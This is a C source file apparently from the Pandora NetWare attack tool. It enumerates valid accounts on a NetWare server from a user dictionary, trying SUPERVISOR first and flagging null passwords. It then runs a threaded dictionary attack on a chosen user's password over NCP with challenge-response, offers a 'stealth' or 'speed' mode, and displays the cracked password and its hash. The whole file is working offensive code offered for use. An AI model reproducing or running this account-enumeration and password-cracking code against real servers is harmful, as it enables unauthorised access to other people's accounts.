#include "panrcp.h"

/* local vars */
MOBJECT pref_speed, pref_stealth;
MOBJECT screen;

/* global func of the common directory */
void PopupMenuCB                 (MOBJECT obj, MEvent * pe, void *pdown);
int  ShowPasswordList            (int type);
void FreeGlobalPandoraMemory();

/* general func to test password / user */
int testpw(char *name, int type, char *pw, uint32 *id_of_user, int speed)
{
 uint8 logkey[8];
 int err;
 Pan_PassHack pPassHack_t;
 int i;
 
 err=getobjid(name,type,id_of_user);
 if (err) return(-1);
 
 /* if getlogkey returns a value, this means it's old Nw3 shit */
 /* we therefore switch to a non-crypted test */
 if (getlogkey(logkey)) return(trypw(name,type,pw));

 pPassHack_t.objectID=*id_of_user;
 pPassHack_t.pwlen=strlen(pw);
 for(i=0;i<pPassHack_t.pwlen;i++) pPassHack_t.pw_first[i]=(uint8)pw[i];
 pPassHack_t.pw_first[pPassHack_t.pwlen]='\0';

 /* FALSE to say hash is unknown */
 /* logkey in entry is challenge, logkey in output is response */

 Pan_Challenge_Response(&pPassHack_t,FALSE,logkey,logkey);

 if (speed==0)
  return(trypwcrypt(logkey,type,name));  /* stealth */
 else
  return(trypwcrypt(logkey,type,name));  /* stealth */
}

/************* first part : searching for valid users ***************/
void FindUsers(MOBJECT o, void *o_data, void *a_data)
{
 FILE *f;
 char words[MAXNAMELEN]; /* users name extracted from file */
 char fname[MAXFNAMELEN]; /* filename */
 char pname[MAXPATHLEN+MAXFNAMELEN];  /* path */
 int err,TEST;
 uint32 id_of_user;
 Pan_PassList q;

#ifdef UNIX
 if (!preference.default_server[0])
  {
   MMessageDialog("", "o O Select a server first (File->Server ...) O o", "Ok", NULL);
   return;
  }
#endif

 /* Cleaning vars and display */
 /* race conditions could occure with crac_pa.c dic_att.c */
 /* when displaying good match for password */
 FreeGlobalPandoraMemory();

 if (slist) /** slist exists after first creation and must be reinitialized **/
  {
   MObjectRemoveEventNotifyCallback(slist, PopupMenuCB, mouse_menu);
   MObjectDestroy(mouse_menu);
   MObjectDestroy(slist);
   slist=NULL;
  }

 selection:
  fname[0] = '\0';
  pname[0] = '\0';
  if (!MFileSelection("Load User Dictionary", "*.txt", fname, pname, True)) return;
  strcat(pname,fname);
  if (MMessageDialog("", pname, "Yes", "No", NULL)) goto selection;

 /* HERE CODE TO BUILD NEW LIST */
 f=fopen(pname, "r");
  if (f==NULL)
   {
    MSListAddItem(rlist,"Unable to open the selected file",NULL);
    return;
   }
 MSListAddItem(rlist,"Searching for lusers...",NULL);

 pPassList=Pan_PassList_alloc();
 q=pPassList;
 strcpy(q->userCN,"CN="); MakeUnicodeName(q->userCN);
 TEST=FALSE;
 strcpy(words,"SUPERVISOR"); /* allways try that one first */

 err=GUI_Pan_NCP_connect();

 while (!feof(f))
  {
   err=testpw(words,0x100,"",&id_of_user,0);

   if (err==255||err==0) /* user exists (or) has null password */
    {
     if (TEST) /*so we don't allocate more than needed*/
      {
       q->next=Pan_PassList_alloc();
       q=q->next;
      }
     TEST=TRUE;
     if (!strcmp(words,"SUPERVISOR")) id_of_user=0x01000000;
     q->bind=0x0100;
     q->id=id_of_user;
     q->objectID=id_of_user;
     q->parentID=0x0000;
     q->pwlen_known=FALSE;
     q->pwlen=0;
     q->pwhash_known=FALSE;
     q->userOU[0]='\0';
     q->password[0]='\0';
     strcpy(q->userCN,"CN=");
     strcpy(q->userCN+3,words);
     MakeUnicodeName(q->userCN);
     
     if (err==0) /* user has NULL password */
      {
       q->pwlen_known=TRUE;
       q->pwhash_known=TRUE;
       Pan_PassList_to_PassHack(q,&pPassHack); /* save information */
       pPassHack.pw_first[0]='\0';
       pPassHack.pw_current[0]='\0';
       pPassHack.pw_last[0]='\0'; /* NULL values are checked in Pandora API*/
       pPassHack.key_space[0]='\0';
       Pan_Hash_Gen(&pPassHack);
       memcpy(q->hash,pPassHack.hash,16);
      }
    }
   fgets(words,MAXNAMELEN,f);
   words[strlen(words)-1]='\0'; /*remove carriage return*/
  };
 if (f) fclose(f);
 MSListAddItem(rlist,"Done searching.",NULL);

 nIndex=0;
 for (q=pPassList;q!=NULL;q=q->next) nIndex++; /* build an index */
 Index=(Pan_PassList *)calloc(1,nIndex*sizeof(Pan_PassList));
 if (!Index)
  {
   MMessageDialog("", "Out of memory", "Ok", NULL);
   return;
  }
 nIndex=0;
 for (q=pPassList;q!=NULL;q=q->next)  Index[nIndex++]=q; /* fill the index */

 ShowPasswordList(1);
}
/************************* end of first part *******************************/

/*********************** second part : find passwords *******************/
void FindUserPassword_t(void *param)
{
 FILE *f;
 HackIt hHackIt = *((HackIt *)param);
 char words[MAXPASSLEN]; /* words from password file */
 char user[MAXNAMELEN];  /* selected user name */
 char fname[MAXFNAMELEN]; /* filename */
 char pname[MAXPATHLEN+MAXFNAMELEN];  /* path */
 char user_def[512]; /* output string in result list */
 int err=0xff,i;
 uint32 id_of_user;
 Pan_PassList q; /* temp for search */
 LIST_ACT *la;   /* temp for search */

 /* file selection of the password list */
 selection:
  fname[0] = '\0';
  pname[0] = '\0';
  if (!MFileSelection("Load Password List", "*.txt", fname, pname, True))
   {
    free((HackIt *)param);
    return;
   }
  strcat(pname,fname);
  if (MMessageDialog("", pname, "Yes", "No", NULL)) goto selection;

 f=fopen(pname, "r");
 if (f==NULL)
  {
   MSListAddItem(rlist,"Unable to open the selected file",NULL);
   return;
  }

 /* set the item of output list */
  while (!(_smutex_available(&attacking)));
 _smutex_request(&attacking);

 sprintUnicodeName(user_def,hHackIt.pPassHack.userCN,128);
 strcat(hHackIt.str,user_def);
 sprintUnicodeName(user_def,hHackIt.pPassHack.userOU,40);
 strcat(hHackIt.str,".");
 strcat(hHackIt.str,user_def);
 strcpy(user_def,hHackIt.str);
 strcat(hHackIt.str," cracking...");

 MSListAddItem(rlist,hHackIt.str,(&(hHackIt.pos)));
 la=MSListGetItem(rlist,hHackIt.str);
 hHackIt.pos=la->pos+1;
 /** end of race condition risk **/
 _smutex_release(&attacking);

 /* the crack loop */
 /* user name without CN/unicode */
 sprintUnicodeName(user,hHackIt.pPassHack.userCN+6,MAXNAMELEN);
 strcpy(words,"");     /* try first with NULL password */

 err=GUI_Pan_NCP_connect();

 while ((!feof(f))&&(hHackIt.pos>0))
  {
   /* try password if password length matches, or try all if unknown */
   /* we assume a lenght 0 of pwlen implies password is NULL or unknown */
   if ((hHackIt.pPassHack.pwlen==0)||
       (hHackIt.pPassHack.pwlen==strlen(words)))
    {
     err=testpw(user,0x100,words,&id_of_user,hHackIt.tries);
     if (err!=0xff) break; /* something else occured than wrong password */
     /* announce password test failure on this password */
     strcpy(hHackIt.str,user_def);
     strcat(hHackIt.str," last try failed : ");
     strcat(hHackIt.str,words);
     /* race condition */
     while (!(_smutex_available(&attacking)));
     _smutex_request(&attacking);
      if (hHackIt.pos>0) /*collusion test*/
      MSListChangeElement(rlist,hHackIt.pos-1,hHackIt.str,(&(hHackIt.pos)));
     _smutex_release(&attacking);
    }
   fgets(words,MAXPASSLEN,f);
   words[strlen(words)-1]='\0'; /*remove carriage return*/
   for (i=0;i<strlen(words);i++)
   words[i]=toupper(words[i]); /* convert lower case letters
   		                  to upper case letters */
  };

 /* show results */
 if (hHackIt.pos<0) /* did we receive logical stop signal ?? */
  {
   strcpy(hHackIt.str,user_def);
   strcat(hHackIt.str," stopped at:");
   strcat(hHackIt.str,words);
   /* race condition */
   while (!(_smutex_available(&attacking)));
   _smutex_request(&attacking);
    MSListChangeElement(rlist,-hHackIt.pos-1,hHackIt.str,NULL);
   _smutex_release(&attacking);
  }
 else if (err) /* some kind of problem occured */
  {
   strcpy(hHackIt.str,user_def);
   strcat(hHackIt.str," ");
   strcat(hHackIt.str,Pan_error(err));
   /* race condition */
   while (!(_smutex_available(&attacking)));
   _smutex_request(&attacking);
     MSListChangeElement(rlist,hHackIt.pos-1,hHackIt.str,NULL);
   _smutex_release(&attacking);
  }
 else /* we hold the good password */
  {
   strcpy(hHackIt.str,user_def);
   strcat(hHackIt.str," password is:");
   strcat(hHackIt.str,words);
   /* race condition */
   while (!(_smutex_available(&attacking)));
   _smutex_request(&attacking);
     for (q=pPassList;q!=NULL;q=q->next) /* does it match memory */
      if (q->objectID==hHackIt.pPassHack.objectID)
       {
        q->pwlen_known=TRUE;
        q->pwlen=strlen(words);
        q->pwhash_known=TRUE;
        strcpy(q->password,words);
        strcpy(hHackIt.pPassHack.pw_first,words);
        hHackIt.pPassHack.pwlen=strlen(words);
        hHackIt.pPassHack.pw_current[0]='\0';
        hHackIt.pPassHack.pw_last[0]='\0'; /* NULL values are checked in Pandora API*/
        hHackIt.pPassHack.key_space[0]='\0';
        Pan_Hash_Gen(&(hHackIt.pPassHack));
        memcpy(q->hash,hHackIt.pPassHack.hash,16);
        for (la=MSListGetFirstItem(slist); /* is item visible */
             la!=NULL;la=MSListGetNextItem(slist))
         if (Index[(long)la->u_data]==q)
          {
           strcpy(user_def,la->item);
           sprintf(user_def+35,"%03d",(int)q->pwlen);
           user_def[38]=' ';
           for(i=39;i<39+strlen(words);i++) user_def[i]=words[i-39];
           for (i=0;i<16;i++)
            sprintf(user_def+55+i*2,"%02x",q->hash[i]);
           user_def[87]=' ';
           MSListChangeItem(slist,la->item,user_def,la->u_data);
           break;
          }
         break;
       }
      MSListChangeElement(rlist,hHackIt.pos-1,hHackIt.str,NULL);
   _smutex_release(&attacking);
  }
 free((HackIt *)param);
}

void SpeedSelected(MOBJECT p, void *s, void *v)
{
 HackIt *_hHackIt;
 #ifdef UNIX
/* pthread_t pan_thread; */
 #endif

 _hHackIt=(HackIt *)calloc(1,sizeof(HackIt));

 while (!(_smutex_available(&attacking)));
 _smutex_request(&attacking);

 PassHack_to_PassHack(&(_hHackIt->pPassHack),&pPassHack);
 pPassHack.objectID=0;    /* since current record is subject to change */
                          /* we set it to zero so wrong values can't be */
                          /* referenced */

 _smutex_release(&attacking);

 if(MRButtonGetActivationStatus(pref_stealth)==TRUE)
  _hHackIt->tries=0;
 else
  _hHackIt->tries=1;

 MShellDestroy(p);

#if !defined UNIX
 _beginthread(FindUserPassword_t, NULL, 32768, (void *)_hHackIt);
#else
/* pthread_create(&pan_thread,NULL,(void *)FindUserPassword_t,(void *)_hHackIt); */
 FindUserPassword_t((void *)_hHackIt);
#endif

}

void SelectSpeed(MOBJECT o, void *o_data, void *a_data)
{
 MOBJECT form_id;
 MOBJECT label;

 screen = MCreateShell("Speed slection", SF_MODAL);
 MObjectSetBackgroundRGB(screen, 56, 112, 112);

 form_id = MCreateRowForm(screen);
 MObjectSetBackgroundRGB(form_id, 56, 112, 112);

 pref_stealth = MCreateRButton(form_id, "Stealth (slower, simple password test)", FIXED_SMALL);
 MObjectSetBackgroundRGB(pref_stealth, 56, 112, 112);
 MObjectSetForegroundRGB(pref_stealth, 255, 255, 255);
 MRButtonActivate(pref_stealth);

 pref_speed = MCreateRButton(form_id, "Speed (attached to server if password found)", FIXED_SMALL);
 MObjectSetBackgroundRGB(pref_speed, 56, 112, 112);
 MObjectSetForegroundRGB(pref_speed, 255, 255, 255);

 form_id = MCreateColForm(screen);
 MObjectSetBackgroundRGB(form_id, 56, 112, 112);

 label = MCreatePButton(form_id, "Ok", FIXED_SMALL);
 MPButtonSetCallback(label, SpeedSelected, 0L);

 MShellRealize(screen);
}

void FindUserPassword(MOBJECT o, void *o_data, void *a_data)
{
 if (!pPassHack.objectID)
  {
   MMessageDialog("", "o O Double click on a user to select first O o", "Ok", NULL);
   return;
  }
#ifdef UNIX
 if (!preference.default_server[0])
  {
   MMessageDialog("", "o O Select a server first (File->Server ...) O o", "Ok", NULL);
   return;
  }
#endif
SelectSpeed(o,o_data,a_data);
}
/*********************** end of second part  *****************************/


